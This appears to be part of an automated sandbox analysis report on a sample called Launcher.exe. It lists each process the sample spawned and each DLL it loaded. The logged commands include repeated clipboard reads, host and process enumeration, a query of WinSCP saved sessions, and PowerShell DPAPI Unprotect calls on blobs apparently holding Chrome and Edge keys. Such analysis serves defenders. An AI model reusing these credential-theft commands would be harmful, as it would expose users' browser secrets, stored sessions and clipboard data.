        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
